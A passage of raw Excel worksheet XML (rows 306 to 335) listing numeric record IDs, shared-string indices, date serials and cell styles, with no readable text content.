      <c r="D306" s="9" t="s">
        <v>2616</v>
      </c>
      <c r="E306" s="9">
        <v>20654</v>
      </c>
      <c r="F306" s="9" t="s">
        <v>2617</v>
      </c>
      <c r="G306" s="10">
        <v>40290.611111111109</v>
      </c>
      <c r="H306" s="9">
        <v>20654</v>
      </c>
      <c r="I306" s="9" t="s">
        <v>2617</v>
      </c>
      <c r="J306" s="10">
        <v>40290.61041666667</v>
      </c>
      <c r="K306" s="3" t="s">
        <v>223</v>
      </c>
      <c r="L306" s="4">
        <v>3</v>
      </c>
      <c r="M306" s="4">
        <v>1</v>
      </c>
      <c r="N306" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O306" s="3"/>
      <c r="P306" s="3"/>
      <c r="Q306" s="3"/>
    </row>
    <row r="307" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A307" s="9">
        <v>154112</v>
      </c>
      <c r="B307" s="9" t="s">
        <v>1124</v>
      </c>
      <c r="C307" s="9" t="s">
        <v>2618</v>
      </c>
      <c r="D307" s="9" t="s">
        <v>2619</v>
      </c>
      <c r="E307" s="9">
        <v>1965</v>
      </c>
      <c r="F307" s="9" t="s">
        <v>2620</v>
      </c>
      <c r="G307" s="10">
        <v>39721.737500000003</v>
      </c>
      <c r="H307" s="9">
        <v>811</v>
      </c>
      <c r="I307" s="9" t="s">
        <v>2372</v>
      </c>
      <c r="J307" s="10">
        <v>39721.736805555556</v>
      </c>
      <c r="K307" s="9" t="s">
        <v>1125</v>
      </c>
      <c r="L307" s="7">
        <v>5</v>
      </c>
      <c r="M307" s="7">
        <v>1</v>
      </c>
      <c r="N307" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O307" s="9" t="s">
        <v>702</v>
      </c>
      <c r="P307" s="9" t="s">
        <v>703</v>
      </c>
      <c r="Q307" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="308" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A308" s="3">
        <v>154177</v>
      </c>
      <c r="B308" s="3" t="s">
        <v>224</v>
      </c>
      <c r="C308" s="9" t="s">
        <v>2621</v>
      </c>
      <c r="D308" s="9" t="s">
        <v>2622</v>
      </c>
      <c r="E308" s="9">
        <v>14533</v>
      </c>
      <c r="F308" s="9" t="s">
        <v>2623</v>
      </c>
      <c r="G308" s="10">
        <v>39721.843055555553</v>
      </c>
      <c r="H308" s="9">
        <v>14533</v>
      </c>
      <c r="I308" s="9" t="s">
        <v>2623</v>
      </c>
      <c r="J308" s="10">
        <v>39721.740972222222</v>
      </c>
      <c r="K308" s="3" t="s">
        <v>225</v>
      </c>
      <c r="L308" s="4">
        <v>2</v>
      </c>
      <c r="M308" s="4">
        <v>1</v>
      </c>
      <c r="N308" s="3" t="s">
        <v>696</v>
      </c>
      <c r="O308" s="3"/>
      <c r="P308" s="3"/>
      <c r="Q308" s="3"/>
    </row>
    <row r="309" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A309" s="3">
        <v>154195</v>
      </c>
      <c r="B309" s="3" t="s">
        <v>226</v>
      </c>
      <c r="C309" s="9" t="s">
        <v>2624</v>
      </c>
      <c r="D309" s="9" t="s">
        <v>2625</v>
      </c>
      <c r="E309" s="9">
        <v>5640</v>
      </c>
      <c r="F309" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="G309" s="10">
        <v>40710.042361111111</v>
      </c>
      <c r="H309" s="9">
        <v>20310</v>
      </c>
      <c r="I309" s="9" t="s">
        <v>2626</v>
      </c>
      <c r="J309" s="10">
        <v>39865.953472222223</v>
      </c>
      <c r="K309" s="3" t="s">
        <v>227</v>
      </c>
      <c r="L309" s="4">
        <v>3</v>
      </c>
      <c r="M309" s="4">
        <v>1</v>
      </c>
      <c r="N309" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O309" s="3"/>
      <c r="P309" s="3"/>
      <c r="Q309" s="3"/>
    </row>
    <row r="310" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A310" s="3">
        <v>154699</v>
      </c>
      <c r="B310" s="3" t="s">
        <v>228</v>
      </c>
      <c r="C310" s="9" t="s">
        <v>2627</v>
      </c>
      <c r="D310" s="9" t="s">
        <v>2628</v>
      </c>
      <c r="E310" s="9">
        <v>5469</v>
      </c>
      <c r="F310" s="9" t="s">
        <v>2629</v>
      </c>
      <c r="G310" s="10">
        <v>39721.854166666664</v>
      </c>
      <c r="H310" s="9">
        <v>3043</v>
      </c>
      <c r="I310" s="9" t="s">
        <v>813</v>
      </c>
      <c r="J310" s="10">
        <v>39721.831944444442</v>
      </c>
      <c r="K310" s="3" t="s">
        <v>229</v>
      </c>
      <c r="L310" s="4">
        <v>3</v>
      </c>
      <c r="M310" s="4">
        <v>1</v>
      </c>
      <c r="N310" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O310" s="3"/>
      <c r="P310" s="3"/>
      <c r="Q310" s="3"/>
    </row>
    <row r="311" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A311" s="3">
        <v>154949</v>
      </c>
      <c r="B311" s="3" t="s">
        <v>230</v>
      </c>
      <c r="C311" s="9" t="s">
        <v>2630</v>
      </c>
      <c r="D311" s="9" t="s">
        <v>2631</v>
      </c>
      <c r="E311" s="9">
        <v>214668</v>
      </c>
      <c r="F311" s="9" t="s">
        <v>2632</v>
      </c>
      <c r="G311" s="10">
        <v>40861.572222222225</v>
      </c>
      <c r="H311" s="9">
        <v>259904</v>
      </c>
      <c r="I311" s="9" t="s">
        <v>2633</v>
      </c>
      <c r="J311" s="10">
        <v>40652.557638888888</v>
      </c>
      <c r="K311" s="3" t="s">
        <v>231</v>
      </c>
      <c r="L311" s="4">
        <v>3</v>
      </c>
      <c r="M311" s="4">
        <v>1</v>
      </c>
      <c r="N311" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O311" s="3"/>
      <c r="P311" s="3"/>
      <c r="Q311" s="3"/>
    </row>
    <row r="312" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A312" s="3">
        <v>155480</v>
      </c>
      <c r="B312" s="3" t="s">
        <v>232</v>
      </c>
      <c r="C312" s="9" t="s">
        <v>2634</v>
      </c>
      <c r="D312" s="9" t="s">
        <v>2635</v>
      </c>
      <c r="E312" s="9">
        <v>7028</v>
      </c>
      <c r="F312" s="9" t="s">
        <v>2411</v>
      </c>
      <c r="G312" s="10">
        <v>41659.93472222222</v>
      </c>
      <c r="H312" s="9">
        <v>952747</v>
      </c>
      <c r="I312" s="9" t="s">
        <v>2636</v>
      </c>
      <c r="J312" s="10">
        <v>41659.869444444441</v>
      </c>
      <c r="K312" s="3" t="s">
        <v>233</v>
      </c>
      <c r="L312" s="4">
        <v>5</v>
      </c>
      <c r="M312" s="4">
        <v>1</v>
      </c>
      <c r="N312" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O312" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P312" s="3"/>
      <c r="Q312" s="3"/>
    </row>
    <row r="313" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A313" s="3">
        <v>155655</v>
      </c>
      <c r="B313" s="3" t="s">
        <v>272</v>
      </c>
      <c r="C313" s="9" t="s">
        <v>2637</v>
      </c>
      <c r="D313" s="9" t="s">
        <v>2638</v>
      </c>
      <c r="E313" s="9">
        <v>11694</v>
      </c>
      <c r="F313" s="9" t="s">
        <v>2639</v>
      </c>
      <c r="G313" s="10">
        <v>40996.068055555559</v>
      </c>
      <c r="H313" s="9">
        <v>945682</v>
      </c>
      <c r="I313" s="9" t="s">
        <v>2640</v>
      </c>
      <c r="J313" s="10">
        <v>40995.318749999999</v>
      </c>
      <c r="K313" s="3" t="s">
        <v>273</v>
      </c>
      <c r="L313" s="4">
        <v>3</v>
      </c>
      <c r="M313" s="4">
        <v>1</v>
      </c>
      <c r="N313" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O313" s="3"/>
      <c r="P313" s="3"/>
      <c r="Q313" s="3"/>
    </row>
    <row r="314" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A314" s="3">
        <v>156290</v>
      </c>
      <c r="B314" s="3" t="s">
        <v>274</v>
      </c>
      <c r="C314" s="9" t="s">
        <v>2641</v>
      </c>
      <c r="D314" s="9" t="s">
        <v>2642</v>
      </c>
      <c r="E314" s="9">
        <v>23501</v>
      </c>
      <c r="F314" s="9" t="s">
        <v>2643</v>
      </c>
      <c r="G314" s="10">
        <v>40078.795138888891</v>
      </c>
      <c r="H314" s="9">
        <v>5640</v>
      </c>
      <c r="I314" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J314" s="10">
        <v>39990.070138888892</v>
      </c>
      <c r="K314" s="3" t="s">
        <v>275</v>
      </c>
      <c r="L314" s="4">
        <v>4</v>
      </c>
      <c r="M314" s="4">
        <v>2</v>
      </c>
      <c r="N314" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O314" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P314" s="3"/>
      <c r="Q314" s="3"/>
    </row>
    <row r="315" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A315" s="9">
        <v>157232</v>
      </c>
      <c r="B315" s="9" t="s">
        <v>1126</v>
      </c>
      <c r="C315" s="9" t="s">
        <v>2644</v>
      </c>
      <c r="D315" s="9" t="s">
        <v>2645</v>
      </c>
      <c r="E315" s="9">
        <v>15555</v>
      </c>
      <c r="F315" s="9" t="s">
        <v>2646</v>
      </c>
      <c r="G315" s="10">
        <v>39722.600694444445</v>
      </c>
      <c r="H315" s="9">
        <v>15555</v>
      </c>
      <c r="I315" s="9" t="s">
        <v>2646</v>
      </c>
      <c r="J315" s="10">
        <v>39722.588194444441</v>
      </c>
      <c r="K315" s="9" t="s">
        <v>1127</v>
      </c>
      <c r="L315" s="7">
        <v>5</v>
      </c>
      <c r="M315" s="7">
        <v>3</v>
      </c>
      <c r="N315" s="9" t="s">
        <v>700</v>
      </c>
    </row>
    <row r="316" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A316" s="3">
        <v>157237</v>
      </c>
      <c r="B316" s="3" t="s">
        <v>276</v>
      </c>
      <c r="C316" s="9" t="s">
        <v>2647</v>
      </c>
      <c r="D316" s="9" t="s">
        <v>2648</v>
      </c>
      <c r="E316" s="9">
        <v>21632</v>
      </c>
      <c r="F316" s="9" t="s">
        <v>2649</v>
      </c>
      <c r="G316" s="10">
        <v>39722.552083333336</v>
      </c>
      <c r="H316" s="9">
        <v>21632</v>
      </c>
      <c r="I316" s="9" t="s">
        <v>2649</v>
      </c>
      <c r="J316" s="10">
        <v>39722.552083333336</v>
      </c>
      <c r="K316" s="3" t="s">
        <v>277</v>
      </c>
      <c r="L316" s="4">
        <v>3</v>
      </c>
      <c r="M316" s="4">
        <v>1</v>
      </c>
      <c r="N316" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O316" s="3"/>
      <c r="P316" s="3"/>
      <c r="Q316" s="3"/>
    </row>
    <row r="317" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A317" s="13">
        <v>157354</v>
      </c>
      <c r="B317" s="13" t="s">
        <v>1128</v>
      </c>
      <c r="C317" s="9" t="s">
        <v>2650</v>
      </c>
      <c r="D317" s="9" t="s">
        <v>2650</v>
      </c>
      <c r="E317" s="9">
        <v>419</v>
      </c>
      <c r="F317" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G317" s="10">
        <v>39846.461805555555</v>
      </c>
      <c r="H317" s="9">
        <v>5640</v>
      </c>
      <c r="I317" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J317" s="10">
        <v>39843.522916666669</v>
      </c>
      <c r="K317" s="13" t="s">
        <v>1129</v>
      </c>
      <c r="L317" s="7">
        <v>5</v>
      </c>
      <c r="M317" s="7">
        <v>3</v>
      </c>
      <c r="N317" s="13" t="s">
        <v>696</v>
      </c>
      <c r="O317" s="13"/>
      <c r="P317" s="13"/>
      <c r="Q317" s="13"/>
    </row>
    <row r="318" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A318" s="3">
        <v>157674</v>
      </c>
      <c r="B318" s="3" t="s">
        <v>278</v>
      </c>
      <c r="C318" s="9" t="s">
        <v>2651</v>
      </c>
      <c r="D318" s="9" t="s">
        <v>2652</v>
      </c>
      <c r="E318" s="9">
        <v>11683</v>
      </c>
      <c r="F318" s="9" t="s">
        <v>2653</v>
      </c>
      <c r="G318" s="10">
        <v>42215.792361111111</v>
      </c>
      <c r="H318" s="9">
        <v>1037948</v>
      </c>
      <c r="I318" s="9" t="s">
        <v>2654</v>
      </c>
      <c r="J318" s="10">
        <v>42215.772916666669</v>
      </c>
      <c r="K318" s="3" t="s">
        <v>279</v>
      </c>
      <c r="L318" s="4">
        <v>3</v>
      </c>
      <c r="M318" s="4">
        <v>1</v>
      </c>
      <c r="N318" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O318" s="3"/>
      <c r="P318" s="3"/>
      <c r="Q318" s="3"/>
    </row>
    <row r="319" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A319" s="9">
        <v>157832</v>
      </c>
      <c r="B319" s="9" t="s">
        <v>1130</v>
      </c>
      <c r="C319" s="9" t="s">
        <v>2655</v>
      </c>
      <c r="D319" s="9" t="s">
        <v>2656</v>
      </c>
      <c r="E319" s="9">
        <v>8151</v>
      </c>
      <c r="F319" s="9" t="s">
        <v>2657</v>
      </c>
      <c r="G319" s="10">
        <v>39722.606249999997</v>
      </c>
      <c r="H319" s="9">
        <v>7856</v>
      </c>
      <c r="I319" s="9" t="s">
        <v>2658</v>
      </c>
      <c r="J319" s="10">
        <v>39722.597222222219</v>
      </c>
      <c r="K319" s="9" t="s">
        <v>1131</v>
      </c>
      <c r="L319" s="7">
        <v>3</v>
      </c>
      <c r="M319" s="7">
        <v>2</v>
      </c>
      <c r="N319" s="9" t="s">
        <v>705</v>
      </c>
      <c r="Q319" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="320" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A320" s="3">
        <v>157950</v>
      </c>
      <c r="B320" s="3" t="s">
        <v>280</v>
      </c>
      <c r="C320" s="9" t="s">
        <v>2659</v>
      </c>
      <c r="D320" s="9" t="s">
        <v>2660</v>
      </c>
      <c r="E320" s="9">
        <v>22850</v>
      </c>
      <c r="F320" s="9" t="s">
        <v>2661</v>
      </c>
      <c r="G320" s="10">
        <v>42915.775694444441</v>
      </c>
      <c r="H320" s="9">
        <v>367988</v>
      </c>
      <c r="I320" s="9" t="s">
        <v>2662</v>
      </c>
      <c r="J320" s="10">
        <v>42914.654166666667</v>
      </c>
      <c r="K320" s="3" t="s">
        <v>281</v>
      </c>
      <c r="L320" s="4">
        <v>4</v>
      </c>
      <c r="M320" s="4">
        <v>2</v>
      </c>
      <c r="N320" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O320" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P320" s="3"/>
      <c r="Q320" s="3"/>
    </row>
    <row r="321" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A321" s="3">
        <v>158115</v>
      </c>
      <c r="B321" s="3" t="s">
        <v>282</v>
      </c>
      <c r="C321" s="9" t="s">
        <v>2663</v>
      </c>
      <c r="D321" s="9" t="s">
        <v>2664</v>
      </c>
      <c r="E321" s="9">
        <v>6266</v>
      </c>
      <c r="F321" s="9" t="s">
        <v>2665</v>
      </c>
      <c r="G321" s="10">
        <v>39722.643750000003</v>
      </c>
      <c r="H321" s="9">
        <v>6266</v>
      </c>
      <c r="I321" s="9" t="s">
        <v>2665</v>
      </c>
      <c r="J321" s="10">
        <v>39722.643055555556</v>
      </c>
      <c r="K321" s="3" t="s">
        <v>283</v>
      </c>
      <c r="L321" s="4">
        <v>3</v>
      </c>
      <c r="M321" s="4">
        <v>1</v>
      </c>
      <c r="N321" s="3" t="s">
        <v>696</v>
      </c>
      <c r="O321" s="3"/>
      <c r="P321" s="3"/>
      <c r="Q321" s="3"/>
    </row>
    <row r="322" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A322" s="3">
        <v>158657</v>
      </c>
      <c r="B322" s="3" t="s">
        <v>284</v>
      </c>
      <c r="C322" s="9" t="s">
        <v>2666</v>
      </c>
      <c r="D322" s="9" t="s">
        <v>2667</v>
      </c>
      <c r="E322" s="9">
        <v>1288</v>
      </c>
      <c r="F322" s="9" t="s">
        <v>794</v>
      </c>
      <c r="G322" s="10">
        <v>42744.65902777778</v>
      </c>
      <c r="H322" s="9">
        <v>6216216</v>
      </c>
      <c r="I322" s="9" t="s">
        <v>2668</v>
      </c>
      <c r="J322" s="10">
        <v>42744.415972222225</v>
      </c>
      <c r="K322" s="3" t="s">
        <v>285</v>
      </c>
      <c r="L322" s="4">
        <v>5</v>
      </c>
      <c r="M322" s="4">
        <v>3</v>
      </c>
      <c r="N322" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O322" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P322" s="3"/>
      <c r="Q322" s="3"/>
    </row>
    <row r="323" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A323" s="3">
        <v>159099</v>
      </c>
      <c r="B323" s="3" t="s">
        <v>362</v>
      </c>
      <c r="C323" s="9" t="s">
        <v>2669</v>
      </c>
      <c r="D323" s="9" t="s">
        <v>2670</v>
      </c>
      <c r="E323" s="9">
        <v>18038</v>
      </c>
      <c r="F323" s="9" t="s">
        <v>2671</v>
      </c>
      <c r="G323" s="10">
        <v>39899.636111111111</v>
      </c>
      <c r="H323" s="9">
        <v>2974</v>
      </c>
      <c r="I323" s="9" t="s">
        <v>2672</v>
      </c>
      <c r="J323" s="10">
        <v>39723.581250000003</v>
      </c>
      <c r="K323" s="3" t="s">
        <v>363</v>
      </c>
      <c r="L323" s="4">
        <v>3</v>
      </c>
      <c r="M323" s="4">
        <v>1</v>
      </c>
      <c r="N323" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O323" s="3"/>
      <c r="P323" s="3" t="s">
        <v>716</v>
      </c>
      <c r="Q323" s="3" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="324" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A324" s="9">
        <v>159255</v>
      </c>
      <c r="B324" s="9" t="s">
        <v>1132</v>
      </c>
      <c r="C324" s="9" t="s">
        <v>2673</v>
      </c>
      <c r="D324" s="9" t="s">
        <v>2674</v>
      </c>
      <c r="E324" s="9">
        <v>12037</v>
      </c>
      <c r="F324" s="9" t="s">
        <v>2675</v>
      </c>
      <c r="G324" s="10">
        <v>41106.20208333333</v>
      </c>
      <c r="H324" s="9">
        <v>466826</v>
      </c>
      <c r="I324" s="9" t="s">
        <v>2676</v>
      </c>
      <c r="J324" s="10">
        <v>40893.874305555553</v>
      </c>
      <c r="K324" s="9" t="s">
        <v>1133</v>
      </c>
      <c r="L324" s="7">
        <v>3</v>
      </c>
      <c r="M324" s="7">
        <v>1</v>
      </c>
      <c r="N324" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="325" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A325" s="9">
        <v>159590</v>
      </c>
      <c r="B325" s="9" t="s">
        <v>1134</v>
      </c>
      <c r="C325" s="9" t="s">
        <v>2677</v>
      </c>
      <c r="D325" s="9" t="s">
        <v>2678</v>
      </c>
      <c r="E325" s="9">
        <v>8167</v>
      </c>
      <c r="F325" s="9" t="s">
        <v>2679</v>
      </c>
      <c r="G325" s="10">
        <v>43228.879861111112</v>
      </c>
      <c r="H325" s="9">
        <v>4703518</v>
      </c>
      <c r="I325" s="9" t="s">
        <v>2680</v>
      </c>
      <c r="J325" s="10">
        <v>43186.509722222225</v>
      </c>
      <c r="K325" s="9" t="s">
        <v>1135</v>
      </c>
      <c r="L325" s="7">
        <v>3</v>
      </c>
      <c r="M325" s="7">
        <v>1</v>
      </c>
      <c r="N325" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="326" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A326" s="3">
        <v>161039</v>
      </c>
      <c r="B326" s="3" t="s">
        <v>364</v>
      </c>
      <c r="C326" s="9" t="s">
        <v>2681</v>
      </c>
      <c r="D326" s="9" t="s">
        <v>2682</v>
      </c>
      <c r="E326" s="9">
        <v>3140</v>
      </c>
      <c r="F326" s="9" t="s">
        <v>2683</v>
      </c>
      <c r="G326" s="10">
        <v>39723.254861111112</v>
      </c>
      <c r="H326" s="9">
        <v>3140</v>
      </c>
      <c r="I326" s="9" t="s">
        <v>2683</v>
      </c>
      <c r="J326" s="10">
        <v>39723.254166666666</v>
      </c>
      <c r="K326" s="3" t="s">
        <v>365</v>
      </c>
      <c r="L326" s="4">
        <v>3</v>
      </c>
      <c r="M326" s="4">
        <v>1</v>
      </c>
      <c r="N326" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O326" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P326" s="3"/>
      <c r="Q326" s="3"/>
    </row>
    <row r="327" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A327" s="3">
        <v>161362</v>
      </c>
      <c r="B327" s="3" t="s">
        <v>366</v>
      </c>
      <c r="C327" s="9" t="s">
        <v>2684</v>
      </c>
      <c r="D327" s="9" t="s">
        <v>2685</v>
      </c>
      <c r="E327" s="9">
        <v>4742</v>
      </c>
      <c r="F327" s="9" t="s">
        <v>1710</v>
      </c>
      <c r="G327" s="10">
        <v>40861.662499999999</v>
      </c>
      <c r="H327" s="9">
        <v>764846</v>
      </c>
      <c r="I327" s="9" t="s">
        <v>1665</v>
      </c>
      <c r="J327" s="10">
        <v>40860.493055555555</v>
      </c>
      <c r="K327" s="3" t="s">
        <v>367</v>
      </c>
      <c r="L327" s="4">
        <v>4</v>
      </c>
      <c r="M327" s="4">
        <v>2</v>
      </c>
      <c r="N327" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O327" s="3"/>
      <c r="P327" s="3"/>
      <c r="Q327" s="3"/>
    </row>
    <row r="328" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A328" s="3">
        <v>161929</v>
      </c>
      <c r="B328" s="3" t="s">
        <v>368</v>
      </c>
      <c r="C328" s="9" t="s">
        <v>2686</v>
      </c>
      <c r="D328" s="9" t="s">
        <v>2687</v>
      </c>
      <c r="E328" s="9">
        <v>905</v>
      </c>
      <c r="F328" s="9" t="s">
        <v>1748</v>
      </c>
      <c r="G328" s="10">
        <v>41319.474999999999</v>
      </c>
      <c r="H328" s="9">
        <v>8117</v>
      </c>
      <c r="I328" s="9" t="s">
        <v>2688</v>
      </c>
      <c r="J328" s="10">
        <v>41318.713194444441</v>
      </c>
      <c r="K328" s="3" t="s">
        <v>369</v>
      </c>
      <c r="L328" s="4">
        <v>4</v>
      </c>
      <c r="M328" s="4">
        <v>1</v>
      </c>
      <c r="N328" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O328" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P328" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q328" s="3"/>
    </row>
    <row r="329" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A329" s="9">
        <v>162325</v>
      </c>
      <c r="B329" s="9" t="s">
        <v>1136</v>
      </c>
      <c r="C329" s="9" t="s">
        <v>2689</v>
      </c>
      <c r="D329" s="9" t="s">
        <v>2690</v>
      </c>
      <c r="E329" s="9">
        <v>2287</v>
      </c>
      <c r="F329" s="9" t="s">
        <v>2691</v>
      </c>
      <c r="G329" s="10">
        <v>39723.574999999997</v>
      </c>
      <c r="H329" s="9">
        <v>2287</v>
      </c>
      <c r="I329" s="9" t="s">
        <v>2691</v>
      </c>
      <c r="J329" s="10">
        <v>39723.574305555558</v>
      </c>
      <c r="K329" s="9" t="s">
        <v>1137</v>
      </c>
      <c r="L329" s="7">
        <v>3</v>
      </c>
      <c r="M329" s="7">
        <v>1</v>
      </c>
      <c r="N329" s="9" t="s">
        <v>702</v>
      </c>
    </row>
    <row r="330" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A330" s="9">
        <v>162576</v>
      </c>
      <c r="B330" s="9" t="s">
        <v>1138</v>
      </c>
      <c r="C330" s="9" t="s">
        <v>2692</v>
      </c>
      <c r="D330" s="9" t="s">
        <v>2693</v>
      </c>
      <c r="E330" s="9">
        <v>12870</v>
      </c>
      <c r="F330" s="9" t="s">
        <v>2694</v>
      </c>
      <c r="G330" s="10">
        <v>42160.917361111111</v>
      </c>
      <c r="H330" s="9">
        <v>4248328</v>
      </c>
      <c r="I330" s="9" t="s">
        <v>2460</v>
      </c>
      <c r="J330" s="10">
        <v>42160.915972222225</v>
      </c>
      <c r="K330" s="9" t="s">
        <v>1139</v>
      </c>
      <c r="L330" s="7">
        <v>4</v>
      </c>
      <c r="M330" s="7">
        <v>2</v>
      </c>
      <c r="N330" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="331" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A331" s="3">
        <v>163178</v>
      </c>
      <c r="B331" s="3" t="s">
        <v>370</v>
      </c>
      <c r="C331" s="9" t="s">
        <v>2695</v>
      </c>
      <c r="D331" s="9" t="s">
        <v>2696</v>
      </c>
      <c r="E331" s="9">
        <v>1849664</v>
      </c>
      <c r="F331" s="9" t="s">
        <v>2697</v>
      </c>
      <c r="G331" s="10">
        <v>41438.840277777781</v>
      </c>
      <c r="H331" s="9">
        <v>1849664</v>
      </c>
      <c r="I331" s="9" t="s">
        <v>2697</v>
      </c>
      <c r="J331" s="10">
        <v>41438.825694444444</v>
      </c>
      <c r="K331" s="3" t="s">
        <v>371</v>
      </c>
      <c r="L331" s="4">
        <v>3</v>
      </c>
      <c r="M331" s="4">
        <v>1</v>
      </c>
      <c r="N331" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O331" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P331" s="3"/>
      <c r="Q331" s="3"/>
    </row>
    <row r="332" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A332" s="3">
        <v>163684</v>
      </c>
      <c r="B332" s="3" t="s">
        <v>408</v>
      </c>
      <c r="C332" s="9" t="s">
        <v>2698</v>
      </c>
      <c r="D332" s="9" t="s">
        <v>2699</v>
      </c>
      <c r="E332" s="9">
        <v>730</v>
      </c>
      <c r="F332" s="9" t="s">
        <v>1898</v>
      </c>
      <c r="G332" s="10">
        <v>40714.843055555553</v>
      </c>
      <c r="H332" s="9">
        <v>535646</v>
      </c>
      <c r="I332" s="9" t="s">
        <v>2700</v>
      </c>
      <c r="J332" s="10">
        <v>40712.615277777775</v>
      </c>
      <c r="K332" s="3" t="s">
        <v>409</v>
      </c>
      <c r="L332" s="4">
        <v>4</v>
      </c>
      <c r="M332" s="4">
        <v>2</v>
      </c>
      <c r="N332" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O332" s="3"/>
      <c r="P332" s="3"/>
      <c r="Q332" s="3"/>
    </row>
    <row r="333" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A333" s="3">
        <v>163769</v>
      </c>
      <c r="B333" s="3" t="s">
        <v>410</v>
      </c>
      <c r="C333" s="9" t="s">
        <v>2701</v>
      </c>
      <c r="D333" s="9" t="s">
        <v>2702</v>
      </c>
      <c r="E333" s="9">
        <v>19563</v>
      </c>
      <c r="F333" s="9" t="s">
        <v>2703</v>
      </c>
      <c r="G333" s="10">
        <v>41191.961805555555</v>
      </c>
      <c r="H333" s="9">
        <v>1116</v>
      </c>
      <c r="I333" s="9" t="s">
        <v>2704</v>
      </c>
      <c r="J333" s="10">
        <v>41191.921527777777</v>
      </c>
      <c r="K333" s="3" t="s">
        <v>411</v>
      </c>
      <c r="L333" s="4">
        <v>5</v>
      </c>
      <c r="M333" s="4">
        <v>3</v>
      </c>
      <c r="N333" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O333" s="3"/>
      <c r="P333" s="3"/>
      <c r="Q333" s="3"/>
    </row>
    <row r="334" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A334" s="3">
        <v>164447</v>
      </c>
      <c r="B334" s="3" t="s">
        <v>412</v>
      </c>
      <c r="C334" s="9" t="s">
        <v>2705</v>
      </c>
      <c r="D334" s="9" t="s">
        <v>2706</v>
      </c>
      <c r="E334" s="9">
        <v>15168</v>
      </c>
      <c r="F334" s="9" t="s">
        <v>2707</v>
      </c>
      <c r="G334" s="10">
        <v>42030.6875</v>
      </c>
      <c r="H334" s="9">
        <v>3892259</v>
      </c>
      <c r="I334" s="9" t="s">
        <v>2708</v>
      </c>
      <c r="J334" s="10">
        <v>42030.603472222225</v>
      </c>
      <c r="K334" s="3" t="s">
        <v>413</v>
      </c>
      <c r="L334" s="4">
        <v>3</v>
      </c>
      <c r="M334" s="4">
        <v>1</v>
      </c>
      <c r="N334" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O334" s="3"/>
      <c r="P334" s="3"/>
      <c r="Q334" s="3"/>
    </row>
    <row r="335" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A335" s="9">
        <v>164693</v>
      </c>
      <c r="B335" s="9" t="s">
        <v>1140</v>
      </c>
      <c r="C335" s="9" t="s">
        <v>2709</v>
      </c>
      <c r="D335" s="9" t="s">
        <v>2710</v>
      </c>
      <c r="E335" s="9">
        <v>76722</v>
      </c>
      <c r="F335" s="9" t="s">
        <v>2711</v>
      </c>
      <c r="G335" s="10">
        <v>40750.306944444441</v>
      </c>
      <c r="H335" s="9">
        <v>2134</v>
      </c>
      <c r="I335" s="9" t="s">
        <v>1710</v>
      </c>
      <c r="J335" s="10">
        <v>39790.850694444445</v>
      </c>
      <c r="K335" s="9" t="s">
        <v>1141</v>
      </c>
      <c r="L335" s="7">
        <v>5</v>
      </c>
